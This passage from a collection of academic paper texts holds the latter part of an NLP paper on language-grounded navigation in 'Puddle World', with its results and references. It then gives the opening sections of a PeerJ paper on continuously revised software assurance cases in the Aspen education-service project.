cell above the bottommost horse Figure 3: Example goal annotations collected with Mechanical Turk. goals using surrounding objects. At the end of each trial, we asked the same participants to provide goal locations given their own text instructions. This helped filter out a majority of instructions that were ambiguous or ill-specified. Table 1 provides some statistics on the data, and Figure 3 shows example annotations. In total, we collected 3308 instructions, ranging from 2 to 43 words in length, describing over 200 maps. There are 361 unique words in the annotated instructions. We do not perform any pre- processing on the raw annotations. It is plausible that a model designed to handle only local references could not handle global ones (consider our own model without the global gradi- ent maps). For clearer interpretation of results, we evaluate our model in two modes: trained and tested on local and global data separately, or as a combined dataset. While local instructions were obtained eas- ily, the global instructions were collected by design- ing a task in which only nonunique objects were pre- sented to the annotators.5 This precluded simple in- structions like “go left of the 〈object〉” because there would always be more than one of each object type. Therefore, we obtained text with global properties (e.g. middle rock, leftmost tree) to sufficiently pin- point an object. On average, we collected 31 unique local instructions and 10 unique global instructions per map. To quantify the diversity of our dataset, we find the five nearest instructions in the training set for every instruction in the test set, as measured by edit distance (using the word as a unit) normalized by test instruction length. For each of these pairs, we also measure the Manhattan distance between their corresponding goal locations. Figure 4, which visu- 5The other objects were added back into the map after col- lecting the instruction. Figure 4: A heatmap showing the normalized in- struction edit distance and goal Manhattan distance corresponding to the most similar instructions be- tween the train and test set. For each instruction in the test set, we find the five most similar instructions in the training set. Even for those instructions which are similar, the goal locations they describe can be far apart. alizes this analysis, underscores the difficulty of this task; even when two instructions are highly similar, they might correspond to entirely different target lo- cations. This is the case in the example in Figure 1, which has a distance of four between the references goals. Baselines We compare our model to the following baselines: UVFA (text) is a variant of the model described in (Schaul et al., 2015) adapted for our task. The original model made use of two MLPs to learn low dimensional embeddings of states and goals which were then combined via dot product to give value estimates. Goals were represented either as (x,y) coordinates or as states themselves. As our goals are not observed directly but described in text, we replace the goal MLP with the same LSTM as in our model. The state MLP has an identical architecture to that of the UVFA: two hidden layers of dimension 128 and ReLU activations. For consistency with the UVFA, we represent states as binary vectors denot- ing the presence of each type of object at every po- sition. CNN + LSTM is a variant of the model described in Misra et al. (2017), who developed it for a language-grounded block manipulation task. It first convolves the map layout to a low-dimensional rep- 54 Figure 5: Reward achieved by our model and the two baselines on the training environments during re- inforcement learning on both local and global instructions. Each epoch corresponds to simulation on 500 goals, with a goal simulation terminating either when the agent reaches the goal state or has taken 75 actions. resentation (as opposed to the MLP of the UVFA) and concatenates this to the LSTM’s instruction em- bedding (as opposed to a dot product). These con- catenated representations are then input to a two- layer MLP. We also perform analysis to study the represen- tational power of our model, introducing two more comparison models: UVFA (pos) is the original UVFA model from (Schaul et al., 2015), which we evaluate on our mod- ified puddle worlds to determine the difficulty of environment generalization independently from in- struction interpretation. Our model (w/o gradient) is an ablation of our model without the global gradient maps, which allows us to determine the gradients’ role in representation-building. In additional to our reinforcement learning ex- periments, we train these models in a supervised setting to isolate the effects of architecture choices from other concerns inherent to reinforcement learn- ing algorithms. For this purpose, we constructed a dataset of ground-truth value maps for all human- annotated goals using value iteration. We use the models to predict value maps for the entire grid and minimize the mean squared error (MSE) compared to the ground truth values: (7)L′(Θ) = ∑ (s,x) [V̂ (s,x; Θ) − V̄ (s,x)]2 5.1 Implementation details Our model implementation uses an LSTM with a learnable 15-dimensional embedding layer, 30 hid- den units, 8-dimensional embeddings φ(s), and a 3x3 kernel applied to the embeddings, giving a di- mension of 72 for h2(t). The final CNN has layers of {3, 6, 12, 6, 3, 1} channels, all with 3x3 kernels and padding of length 1 such that the output value map prediction is equal in size to the input observa- tion. For each map, a reward of 3 is given for reach- ing the correct goal specified by human annotation and a reward of −1 is given for falling in a puddle cell. The only terminal state is when the agent is at the goal. Rewards are discounted by a factor of 0.95. We use Adam optimization (Kingma and Ba, 2015) for training all models. 6 Results We present empirical results on two different datasets - our annotated puddle world and an exist- ing block navigation task (Bisk et al., 2016). 6.1 Puddle world navigation Comparison with the state-of-the-art We first investigate the ability of our model to learn solely from environment simulation. Figure 5 shows the discounted reward achieved by our model as well as the two baselines for both instruction types. In both experiments, our model is the only one of the 55 Local Global Combined Policy Quality Distance Policy Quality Distance Policy Quality Distance UVFA (text) 0.56 4.71 0.62 6.28 0.61 5.06 CNN + LSTM 0.80 5.73 0.82 6.13 0.82 5.67 Our model 0.87 2.18 0.90 3.35 0.89 3.04 Table 2: Performance of models trained via reinforcement learning on a held-out set of environments and instructions. Policy quality is the true expected normalized reward and distance denotes the Manhattan distance from goal location prediction to true goal position. We show results from training on the local and global instructions both separately and jointly. Local Global MSE Policy Quality Distance MSE Policy Quality Distance UVFA (pos) 1.30 0.48 4.96 1.04 0.52 5.39 UVFA (text) 3.23 0.57 4.97 1.9 0.62 5.31 CNN + LSTM 0.42 0.86 4.08 0.43 0.83 4.18 Our model (w/o gradient) 0.25 0.94 2.39 0.61 0.87 5.15 Our model 0.25 0.94 2.34 0.41 0.89 3.81 Table 3: Performance on a test set of environments and instructions after supervised training. Lower is better for MSE and Manhattan distance; higher is better for policy quality. The gradient basis significantly improves the reconstruction error and goal localization of our model on global instructions, and expectedly does not affect its performance on local instructions. three to achieve an average nonnegative reward after convergence (0.88 for local instructions and 0.49 for global instructions), signifying that the baselines do not fully learn how to navigate through these envi- ronments. Following Schaul et al. (2015), we also evaluated our model using the metric of policy quality. This is defined as the expected discounted reward achieved by following a softmax policy of the value predic- tions. Policy quality is normalized such that an op- timal policy has a score of 1 and a uniform random policy has a score of 0. Intuitively, policy quality is the true normalized expectation of score over all maps in the dataset, instructions per map, and start states per map-instruction pair. Our model outper- forms both baselines on this metric as well on the test maps (Table 2). We also note that the perfor- mance of the baselines flip with respect to each other as compared to their performance on the training maps (Figure 5). While the UVFA variant learned a better policy on the train set, it did not generalize to new environments as well as the CNN + LSTM. Finally, given the nature of our environments, we can use the predicted value maps to infer a goal lo- cation by taking the position of the maximum value. We use the Manhattan distance from this predicted position to the actual goal location as a third met- ric. The accuracy of our model’s goal predictions is more than twice that of the baselines on local refer- ences and roughly 45% better on global references. Analysis of learned representations For the rep- resentation analysis in a supervised setting, we com- pared the predicted value maps of all models against 56 Figure 6: Value map predictions for two environments paired with two instructions each. Despite the dif- ference in instructions, with one being global and the other local in nature and sharing no objects in their descriptions, they refer to the same goal location in the environment in (a). However, in (b), the descriptions correspond to different locations on the map. The vertical axis considers variance in goal location for the same instruction, depending on the map configuration. the unseen test split of maps. Table 3 shows the re- sults of this study. As expected, our model with- out the global gradient performs no differently from the full model on local references, but has higher MSE and average distances to true goal than the full model on global references. We also note that UVFA (pos) performs much worse than both CNN+LSTM and our model, showing the difficulty of environ- ment generalization even when the goals are ob- served directly. (The original UVFA paper (Schaul et al., 2015) demonstrated effective generalization over goal states within a single environment.) Surprisingly, our model trained via reinforcement learning has more precise goal location predictions (as measured via Manhattan distance) than when trained on true state values in a supervised manner. However, the MSE of the value predictions are much higher in the RL setting (e.g., 0.80 vs 0.25 for super- vised on local instructions). This shows that despite the comparative stability of the supervised setting, minimization of value prediction error does not nec- essarily lend itself to the best policy or goal local- ization. Conversely, having a higher MSE does not always imply a worse policy, as seen also in the per- formance of the two UVFA variants in Table 3. Generalization One of the criteria laid out for our model was its ability to construct language repre- sentations and produce accurate value maps, inde- pendent of layouts and linguistic variation. Figure 6 provides examples of two layouts, each with two dif- ferent instructions. In the first map (top), we have both instructions referring to the same location. Our model is able to mimic the optimal value map accu- rately, while the other baselines are not as precise, either producing a large field of possible goal loca- tions (CNN+LSTM) or completely missing the goal (UVFA-text). On the vertical axis, we observe generalization across different maps with the same instructions. Our model is able to precisely identify the goals in each scenario in spite of significant variation in their 57 Figure 7: Examples of failure cases for our model. Multiple levels of indirection in (a) and a long in- struction filled with redundant information in (b) make the instruction difficult to interpret. Intended goal locations are outlined in red for clarity. locations. This proves harder for the other represen- tations. Although our model is compositional in the sense that it transfers knowledge of spatial references be- tween different environments, some types of instruc- tions do prove challenging. We identify two of the poorest predictions in Figure 7. We see that multiple levels of indirection (as in 7a, which references a lo- cation relative to an object relative to another object) or unnecessarily long instructions (as in 7b, which uniquely identifies a position by the eighth token but then proceeds with redundant information) are still a challenge. Learning curve Due to the manual effort that comes with constructing a dataset of human anno- tations, it is also important to consider the sample- efficiency of a model. Figure 8 shows the quality policy and prediction error on local instructions as a function of training set size. Our model reaches 0.90 policy quality with only 400 samples, demonstrating efficient generalization capability. Figure 8: Effect of training set size on held-out pre- dictions. The curves show the mean of ten training runs and the shaded regions show standard devia- tion. Our model’s policy quality is greater than 0.90 with as few as 400 training goal annotations. Language Grounding Dataset Policy Quality Distance UVFA (text) 0.15 4.61 CNN + LSTM 0.17 4.11 Our model 0.74 3.94 Table 4: The performance of our model and two baselines on the ISI Language Grounding dataset (Bisk et al., 2016). Our model once again out- performs the baselines, although all models have a lower policy quality on this dataset than on our own. 6.2 ISI Grounding Dataset We also evaluate our model on the ISI Language Grounding dataset (Bisk et al., 2016), which con- tains human-annotated instructions describing how to arrange blocks identified by numbers and logos. Although it does not contain variable environment maps as in our dataset, it has a larger action space and vocabulary. The caveat is that the task as posed in the original dataset is not compatible with our model. For a policy to be derived from a value map with the same dimension as the state observation, it is implicitly assumed that there is a single con- trollable agent, whereas the ISI set allows multiple blocks to be moved. We therefore modify the ISI setup using an oracle to determine which block is given agency during each step. This allows us to 58 Figure 9: (a-c) Visualizations of tasks from the ISI Language Grounding dataset (Bisk et al., 2016) and our model’s value map predictions. The agentive block and goal location are outlined in red for visibility. (d) The MSE of the value map prediction as a function of a subgoal’s ordering in an overall task. The model performs better on subgoals later in a task despite the subgoals being treated completely independently during both training and testing. retain the linguistic variability of the dataset while overcoming the mismatch in task setup. The states are discretized to a 13×13 map and the instructions are lemmatized. Performance on the modified ISI dataset is re- ported in Table 4 and representative visualizations are shown in Figure 9. Our model outperforms both baselines by a greater margin in policy quality than on our own dataset. Misra et al. (2017) also use this dataset and report results in part by determining the minimum distance between an agent and a goal during an evaluation lasting N steps. This evaluation metric is therefore dependent on this timeout parameter N. Because we discretized the state space so as to be able to repre- sent it as a grid of embeddings, the notion of a single step has been changed and direct comparison limited to N steps is ill-defined.6 Hence, due to modifica- 6When a model is available and the states are not over- whelmingly high-dimensional, policy quality is a useful metric that is independent of this type of parameter. As such, it is our tions in the task setup, we cannot compare directly to the results in Misra et al. (2017). Understanding grounding evaluation An inter- esting finding in our analysis was that the difficulty of the language interpretation task is a function of the stage in task execution (Figure 9(d)). In the ISI Language Grounding set (Bisk et al., 2016), each individual instruction (describing where to move a particular block) is a subgoal in a larger task (such as constructing a circle with all of the blocks). The value maps predicted for subgoals occurring later in a task are more accurate than those occurring early in the task. It is likely that the language plays a less crucial role in specifying the subgoal position in the final steps of a task. As shown in Figure 9(a), it may be possible to narrow down candidate subgoal po- sitions just by looking at a nearly-constructed high- default metric here. However, estimating policy quality for en- vironments substantially larger than those investigated here is a challenge in itself. 59 level shape. In contrast, this would not be possible early in a task because most of the blocks will be randomly positioned. This finding is consistent with a result from Branavan et al. (2011), who reported that strategy game manuals were useful early in the game but became less essential further into play. It appears to be part of a larger trend that the marginal benefit of language in such grounding tasks can vary predictably between individual instructions. 7 Conclusions We have described a novel approach for grounded spatial reasoning. Combining the language repre- sentation in a spatially localized manner allows for increased precision of goal identification a nd im- proved performance on unseen environment config- urations. Alongside our models, we present Pud- dle World Navigation, a new grounding dataset for testing the generalization capacity of instruction- following algorithms in varied environments. Acknowledgement We thank the members of the MIT NLP group, the TACL reviewers and action editor for helpful feedback. We gratefully acknowledge support from the MIT Lincoln Laboratory and the MIT Super- UROP program. References Jacob Andreas and Dan Klein. 2015. Alignment-based compositional semantics for instruction following. In EMNLP. Yoav Artzi and Luke Zettlemoyer. 2013. Weakly su- pervised learning of semantic parsers for mapping in- structions to actions. TACL, 1(1):49–62. Richard Bellman. 1957. Dynamic Programming. Princeton University Press, Princeton, NJ, USA, 1 edi- tion. Yonatan Bisk, Deniz Yuret, and Daniel Marcu. 2016. Natural language communication with robots. In NAACL HLT, pages 751–761. S.R.K. Branavan, David Silver, and Regina Barzilay. 2011. Learning to win by reading manuals in a Monte- Carlo framework. In ACL HLT, pages 268–277. Michael Buhrmester, Tracy Kwang, and Samuel D. Gosling. 2011. Amazon’s Mechanical Turk. Per- spectives on Psychological Science, 6(1):3–5. PMID: 26162106. Ruth M.J. Byrne and Philip N. Johnson-Laird. 1989. Spatial reasoning. Journal of memory and language, 28(5):564–575. David L. Chen and Raymond J. Mooney. 2011. Learn- ing to interpret natural language navigation instruc- tions fro mobservations. In Proceedings of the 25th AAAI Conference on Artificial Intelligence (AAAI- 2011), pages 859–865, San Francisco, CA, USA, Au- gust. Kan Chen, Jiang Wang, Liang-Chieh Chen, Haoyuan Gao, Wei Xu, and Ram Nevatia. 2015. ABC- CNN: An attention based convolutional neural net- work for visual question answering. arXiv preprint arXiv:1511.05960. William T. Freeman and Edward H. Adelson. 1991. The design and use of steerable filters. IEEE TPAMI, 13(9):891–906. Sachithra Hemachandra, Matthew R. Walter, Stefanie Tellex, and Seth Teller. 2014. Learning spatial- semantic representations from natural language de- scriptions and scene classifications. In ICRA, pages 2623–2630. IEEE. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural computation, 9(8):1735– 1780. John D. Kelleher, Geert-Jan M. Kruijff, and Fintan J. Costello. 2006. Proximity in context: an empirically grounded computational model of proximity for pro- cessing topological spatial expressions. In ACL, pages 745–752. Joohyun Kim and Raymond J. Mooney. 2013. Adapting discriminative reranking to grounded language learn- ing. In ACL (1), pages 218–227. Diederik P. Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In ICLR. Thomas Kollar, Stefanie Tellex, Deb Roy, and Nicholas Roy. 2010. Toward understanding natural language directions. In Human-Robot Interaction, pages 259– 266. IEEE. Stephen C Levinson. 2003. Space in language and cog- nition: Explorations in cognitive diversity, volume 5. Cambridge University Press. Michael Levit and Deb Roy. 2007. Interpretation of spa- tial language in a map navigation task. IEEE Transac- tions on Systems, Man, and Cybernetics, Part B (Cy- bernetics), 37(3):667–679. Peggy Li and Lila Gleitman. 2002. Turning the ta- bles: Language and spatial reasoning. Cognition, 83(3):265–294. Matt MacMahon, Brian Stankiewicz, and Benjamin Kuipers. 2006. Walk the talk: Connecting language, knowledge, and action in route instructions. AAAI, 2(6):4. 60 Daniel J. Mankowitz, Timothy Arthur Mann, and Shie Mannor. 2016. Iterative hierarchical optimiza- tion for misspecified problems (IHOMP). CoRR, abs/1602.03348. Dipendra K. Misra, John Langford, and Yoav Artzi. 2017. Mapping instructions and visual observations to actions with reinforcement learning. EMNLP. Volodymyr Mnih, Koray Kavukcuoglu, David Silver, Andrei A. Rusu, Joel Veness, Marc G. Bellemare, Alex Graves, Martin Riedmiller, Andreas K. Fidje- land, Georg Ostrovski, Stig Petersen, Charles Beat- tie, Amir Sadik, Ioannis Antonoglou, Helen King, Dharshan Kumaran, Daan Wierstra, Shane Legg, and Demis Hassabis. 2015. Human-level control through deep reinforcement learning. Nature, 518(7540):529– 533, 02. Reinhard Moratz and Thora Tenbrink. 2006. Spatial ref- erence in linguistic human-robot interaction: Iterative, empirically supported development of a model of pro- jective relations. Spatial cognition and computation, 6(1):63–107. Tom Schaul, Daniel Horgan, Karol Gregor, and David Silver. 2015. Universal value function approximators. In ICML, pages 1312–1320. M. Skubic, D. Perzanowski, S. Blisard, A. Schultz, W. Adams, M. Bugajska, and D. Brock. 2004. Spatial language for human-robot dialogs. IEEE Transactions on Systems, Man, and Cybernetics, Part C (Applica- tions and Reviews), 34(2):154–167, May. Richard S. Sutton and Andrew G. Barto. 1998. Introduc- tion to reinforcement learning. MIT Press. Richard S. Sutton. 1996. Generalization in rein- forcement learning: Successful examples using sparse coarse coding. In NIPS. Stefanie Tellex, Thomas Kollar, Steven Dickerson, Matthew R. Walter, Ashis Gopal Banerjee, Seth J. Teller, and Nicholas Roy. 2011. Understanding natu- ral language commands for robotic navigation and mo- bile manipulation. In AAAI. Thora Tenbrink. 2007. Space, Time, and the Use of Lan- guage: An Investigation of Relationships, volume 36. Walter de Gruyter. Jette Viethen and Robert Dale. 2008. The use of spatial relations in referring expression generation. In Pro- ceedings of the Fifth International Natural Language Generation Conference, pages 59–67. ACL. Adam Vogel and Dan Jurafsky. 2010. Learning to follow navigational directions. In ACL, pages 806–814. Matthew R. Walter, Sachithra Hemachandra, Bianca Homberg, Stefanie Tellex, and Seth Teller. 2013. Learning semantic maps from natural language de- scriptions. Proceedings of the 2013 Robotics: Science and Systems IX Conference. 61 62 work_en2rpj3s6rhivnhyoexbnb5mbq ---- Submitted 13 January 2016 Accepted 14 November 2016 Published 19 December 2016 Corresponding author Kimio Kuramitsu, kimio@ynu.ac.jp Academic editor Mariagrazia Fugini Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.101 Copyright 2016 Kuramitsu Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Continuously revised assurance cases with stakeholders’ cross-validation: a DEOS experience Kimio Kuramitsu Graduate School of Electronic and Computer Engineering, Yokohama National University, Japan ABSTRACT Recently, assurance cases have received much attention in the field of software-based computer systems and IT services. However, software changes very often, and there are no strong regulations for software. These facts are two main challenges to be addressed in the development of software assurance cases. We propose a method of developing assurance cases by means of continuous revision at every stage of the system life cycle, including in operation and service recovery in failure cases. Instead of a regulator, dependability arguments are validated by multiple stakeholders competing with each other. This paper reported our experience with the proposed method in the case of Aspen education service. The case study demonstrates that continuous revisions enable stakeholders to share dependability problems across software life cycle stages, which will lead to the long-term improvement of service dependability. Subjects Security and Privacy, Software Engineering Keywords Assurance cases, GSN, DEOS process, Experience report, Service dependability INTRODUCTION Assurance cases are documentation-based engineering with structured arguments on safety and dependability. Originally, assurance cases were developed in the field of safety engineering for public transportation and industrial plants, and they have been adopted broadly as a documentation standard (Bloomfield & Bishop, 2010). Many regulators, especially in EU countries, are likely to validate assurance cases before the developed systems are deployed. Recently, due to increased attention to safety and dependability in software, many developers have become interested in the application of assurance cases for software. However, software often changes over time and even needs to change after deployment. The emerging style of DevOps development suggests that it would be difficult to separate developments from service operations. This also makes it difficult for a regulator to assess assurance cases, thereby resulting in the absence of strong regulators for software in general. To overcome these difficulties, the DEOS process (Tokoro, 2015) was developed with the life cycle maintenance of assurance cases. The idea is straightforward: assurance cases are revised in a synchronized way as software updates. An arising question is as follows: who validates such revised assurance cases, even in the post-development phase? The answer is still unclear in the DEOS process. In this paper, we assume that stakeholders How to cite this article Kuramitsu (2016), Continuously revised assurance cases with stakeholders’ cross-validation: a DEOS experience. PeerJ Comput. Sci. 2:e101; DOI 10.7717/peerj-cs.101 https://peerj.com mailto:kimio@ynu.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.101 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.101 who are competing with each other are motivated to validate cases because they will suffer directly from others’ faulty claims in assurance cases. However, many questions remain. Can non-expert stakeholders learn about assurance cases and then join dependability arguments? Is the validation strong enough? To confirm these questions, we organized a case study experiment, the Aspen project, in which multiple stakeholders (e.g., developers, operators, and users) are involved in the software life cycle from development to service operation. Throughout the life cycle, all stakeholders will have participated in arguing for or against the dependability using assurance cases written in Goal-Structuring Notation (GSN) (Kelly & Weaver, 2004), a standard notation of assurance cases. Unfortunately, service failures occurred during the experiment period, although all the stakeholders made extensive arguments in favor of GSN notations. The occurrence of service failure does not imply the weakness of stakeholders’ cross-validation, because system failure happened in a case of regulator validations. Rather, the analysis of the failure case gives us a useful insight: the structured dependability arguments in GSNs make it easier to find and share dependability problems across organizations. Since transferring dependability problems is a missing part of software life cycle iteration, continuously revised assurance cases can be a new approach to the long-term dependability of ever-changing software. This paper focuses on the report of the Aspen case study. The rest of the paper proceeds as follows: ‘What Are Assurance Cases?’ introduces assurance cases and reviews-related work; ‘Argumentation Architecture’ presents our basic ideas for developing assurance cases for software; ‘Experimental Setup: Aspen Project’ describes the Aspen project; ‘Aspen Cases’ examines the assurance cases that were developed in the Aspen project; ‘Lessons Learned and Discussions’ discusses lessons learned; and ‘Conclusion’ concludes the paper. WHAT ARE ASSURANCE CASES? Assurance cases are document-based engineering with structured arguments related to safety and dependability (Avizienis et al., 2004). In this paper, we use the term dependability in a broader sense related to safety. The documents of assurance cases are structured to transfer the dependability confidence of products and services to others, such as regulators and third-party organizations. To make the confidence explicit, assurance cases are usually argued in the form of claim-argument-evidence (CAE). Figure 1 illustrates the conceptual structure of assurance cases with the CAE arguments. For example, consider the claim that a system is adequately dependable for operating in a given context. The argument explains the available evidence, showing how it reasonably supports the claim. The top-most claim is decomposed into a series of sub-claims until these can be solved with evidence. Since the arguments make the rationale for the claim explicit, they are rigorous, justified, defensible, and transparent. Due to the high transparency of dependability arguments, assurance cases generally serve as an efficient risk-communication tool between organizations. However, the most practically used scenario is transferring the developer’s confidence to a regulator or a Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 Claim Evidence Claim of some properties Arguments Evidence supporting their claims Claim1 Claim2 Claim3 Claim4 Evidence Evidence Figure 1 Argument structure of assurance cases. third-party company to assess the conformance of dependability regulations (Graydon et al., 2012). Through this assessment mechanism, the regulator forces the developer’s product to meet its regulations, and then the user trusts the developer’s product due to the regulator’s authority. In contrast, the self-assessment of conformance or the absence of dependability regulations makes assurance cases self-righteous and less confident. Related work Our work builds on many excellent existing ideas for the development of assurance cases in software, including life cycle developments (Graydon, Knight & Strunk, 2007), argument patterns (Weaver, McDermid & Kelly, 2002; Hawkins et al., 2011), and reviewing arguments (Kelly, 2007; Yuan & Kelly, 2012). In particular, Graydon, Knight & Strunk (2007) proposed a closed approach to integrating assurance into the development process by co-developing the software system and its assurance case. Hawkins et al. extensively studied the assurance aspect of the software process (Hawkins et al., 2013) and software evolution (Hawkins et al., 2014). A clear, new idea presented in this paper is the use of accountability (by dependability arguments with stakeholder identity), which allows multiple competing stakeholders to share dependability problems across the life cycle stages. In general, assurance information needs to be kept confidential in safety-critical systems (Bloomfield, 2013). However, many experimental research reports have been published for researchers as in an unmanned aircraft (Denney, Habli & Pai, 2012), automobiles (ISO 26262) (Ruiz, Melzi & Kelly, 2015), autonomous vehicle and aircraft safety critical software (Hawkins et al., 2011), generic infusion pumps (Kim et al., 2011), pacemakers (Jee, Lee & Sokolsky, 2010), and health IT services (Despotou et al., 2012). In these reported areas, there exists strong regulators who validate the safety of products and services, and the development of reported assurance cases is initially motivated for their regulators. In comparison, our experience report is unique in terms of neither regulators nor safety standards. How assurance cases to be developed for improved software without regulators is an interesting open question for software practitioners (Tokoro, 2015). Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 3/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 ARGUMENTATION ARCHITECTURE This section describes our ideas on how to use assurance cases in software-based IT systems with no strong regulator. Sharing dependability arguments Our initial motivation comes from the risk of miscommunication between stakeholders, such as developers and operators, who separately act in distinct phases of the life cycle. In other words, limitations discussed during software development are quite useful for operators attempting to deliver the correct services, but they are unseen at the time of operation. On the contrary, discussions at the time of operation can provide useful feedback for further development. Sharing such discussions, which are focused on dependability, is demanded extensively to improve the long-term dependability of the products and services. Our aim in the use of assurance cases is to share dependability arguments among stakeholders throughout the life cycle. As introduced in ‘What Are Assurance Cases?’, the arguments are well structured and more likely to inspire confidence in stakeholders due to the supporting evidence. This would suggest that assurance cases serve as a good foundation for sharing focused knowledge and risk communications. The argumentation architecture needs to change slightly when we attempt to apply it between (a) one stakeholder and another and (b) many stakeholders to many others. First, the top claim must represent a common goal and assumptions that are shared among all stakeholders. We decompose the common claim into sub-claims so that each stakeholder can separately lead his or her active part of the dependability arguments. The top claim is decomposed by stages in the life cycle of products and services. Then, we decompose each stage claim by stakeholders if multiple acting stakeholders exist in the same stage. Each stakeholder has to provide available evidence that supports dependability claims that are part of the common goal. Staging in the lifecycle varies from project to project, but we refer to the following stages in this paper. • Planning stage (requirement elicitation and architecting) • Development stage (coding and testing) • Operation stage (service design and failure recovery) • Evolution stage (change accommodation). Note that the abovementioned stage decomposition is based on the open system dependability (Tokoro, 2015) that we proposed in the JST/DEOS project. It is distinct in its evolution stage, when all stakeholders argue for the continuous improvement of services beyond the lifetime of a single system operation. Accountability, rebuttals, and revision Currently, most software-based IT services run under no regulation. As described in ‘What Are Assurance Cases?’, the absence of strong regulators may reduce the practicality of assurance cases. This is a challenge to be avoided in practice. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 Claim Evidence 1 Developer A Claim1 Claim2 Operator C Claim3 Developer A Claim4 Developer B Evidence 2 Developer B Evidence 3 Operator C Rebuttal 1 Operator C In development In operation Agreement Figure 2 Cross-Validation and Agreements on Conflicts. The first idea to confront this problem is the use of the concept of accountability (Haeberlen, Kouznetsov & Druschel, 2007); accountability is widely used to build trust and reputation among competing individuals and organizations by exposing failures. In the context of assurance cases, we can integrate the concept of accountability by recording the stakeholder’s identity in every element of assurance cases. That is, the stakeholder’s identity can be used to trace who makes a faulty claim or who gives faulty evidence when a problem occurs. In general, this results in strong incentives to avoid faulty claims and evidence. In addition to stakeholder accountability, we include a form of rebuttal in the dependability arguments. In the context of assurance cases, a rebuttal is a challenge to a claim or an objection to the evidence, usually noted in the review process. Rebuttals do not remain during the assessment process because they need to be solved prior to certification. In the case of the absence of a regulator, a rebuttal is not strong enough to enforce modification. Unsolved rebuttals are considered conflicts. If the conflicts remain between stakeholders, the claim containing the rebuttal also is regarded in terms of the stakeholder agreements. Note that the rebuttals are recorded with the stakeholder’s identity for accountability. Based on the recorded rebuttals, we use cross-validation between stakeholders instead of third-party reviewers, since stakeholders in part compete with each other (e.g., a developer wants reduced costs for development, but this makes improperly developed systems a potential risk). A faulty claim often becomes a potential risk for other stakeholders. Naturally, non-rebuttal claims are regarded as approved by all stakeholders with some sharable responsibility when a problem occurs. This also leads to other incentives to make rebuttals to others’ claims. Figure 2 illustrates our proposed argumentation architecture with life cycle decomposition and stakeholder identities. More importantly, recall that our aim is to facilitate sharing dependability problems between stakeholders, not to facilitate competition among them. The developers and the operators can change software or service operations if they agree on the given rebuttals. In addition, they also are allowed to revise the related assurance cases if their practice Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 5/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 !"#$% &#'#()*+ ,-.*(%/*0%1*+23)* "(%,.#)4*% 5617!% 8#0039 5"(3:"+3(; 16-:*< ,1=>?%/*0% @'3*(:%3(% @'#--+""< Figure 3 Overview of Aspen system. is changed. This results in an iterative process that enables us to better capture the ever-changing nature of software and maintain the dependability of changing software. Note that we assume that all revised versions of assurance cases can be maintained by a proper version control system. AssureNote, which used in this experiment, has been developed for this purpose. EXPERIMENTAL SETUP: ASPEN PROJECT The Aspen project is our organized experiment as a part of the JST/DEOS project (Tokoro, 2015) to investigate the life cycle maintenance of assurance cases without any regulators. The Aspen project includes not only the development of assurance cases across different organizations but also Aspen’s software development and service operation with DEOS industrial partners. This section describes the experimental design in the Aspen project. System and service overview Aspen is an online education system that provides exercises on programming to students via the Web. Figure 3 provides the overview of the Aspen service. The Aspen system are not so unique and consists of multiple servers, including Apache Web servers, MySQL servers, and Zabbix monitor servers, which run on Linux operating systems. All of the software that constitutes the Aspen system are written in scripting languages such as Python and JavaScript. Due to the Agile feature of these languages, the Aspen system is updated often, even after its deployment. Aspen is a typical Web-based system, not a safety-critical system, which is the system on which assurance cases mainly have been developed so far. However, Aspen involves Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 6/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 Figure 4 GSN elements. several dependability attributes (Avizienis et al., 2004) that are commonly required in software-based IT services: • Availability: the service always will be available to the users (i.e., students). • Reliability: no hardware or software failures occur during provision of the service. • Integrity: programming assignments supplied by the owner do not disappear. • Privacy: personal information is not disclosed to unauthorized parties. Documentation and tool supports In the Aspen project, we use Goal Structuring Notation (Kelly & Weaver, 2004) to share assurance cases among stakeholders. GSN is a standard argumentation notation of assurance cases in safety-critical industries. GSN consists of four principal elements, goal (depicted as a rectangle), strategy (parallelogram), evidence (oval), and context (rounded rectangle), as shown in Fig. 4. The goal element is used to state a claim that a system certainly has some desirable properties, such as safety and dependability. The evidence element is some piece of material to support that the linked claim is true. The goal without linked evidence is called undeveloped. As in the CAE notation, a goal is decomposed into sub-goals until a point is reached where claims can be supported by direct reference to available evidence. The strategy element is used to state a reason for claim decomposition. The context element is used to state an assumption (the system scope and the assumed properties). There is no special support for stating a rebuttal. We regard the context element linked to the evidence as the rebuttal element. In the experiment, we used AssureNote (Shida et al., 2013), a Web-based authoring tool that allows multiple users to share a GSN document via the Web. Figure 5 is a screenshot of AssureNote. In AssureNote, all GSN elements are automatically recorded with the user identity under the version control of GSN elements. Kuramitsu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.101 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.101 Figure 5 AssureNote: a Web-based GSN authoring tool. Stakeholders Another main aim of the Aspen project is to examine the effect of assurance cases in the absence of a strong regulator. As described in ‘Argumentation Architecture’, we need to set up some competing relationship between stakeholders. All stakeholders were selected from different institutes. First, we contracted two different firms separately: one that took charge in software development and the other in service operation. Second, we asked an instructor who had adopted the Aspen system in her classroom to join the experiment as a stakeholder. The author plays a coordinator role, not a regulator role throughout the whole stage. The stakeholders involved in the Aspen project are listed below. • Owner: The author • Developer: A programmer working for a software development firm • Operator: A system engineer with more than 10 years’ experience with Web-based service operations • User: An instructor who use the Aspen in her classroom. In this paper, 